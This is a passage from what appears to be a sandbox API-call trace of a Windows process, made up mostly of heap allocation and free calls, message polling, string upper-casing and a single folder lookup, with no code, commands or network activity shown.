(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0223.628] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0223.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0223.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0223.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.633] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x20000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 0x9e2078 [0223.633] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0223.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.634] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab848 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.635] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0223.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0223.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0223.636] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.636] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0223.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 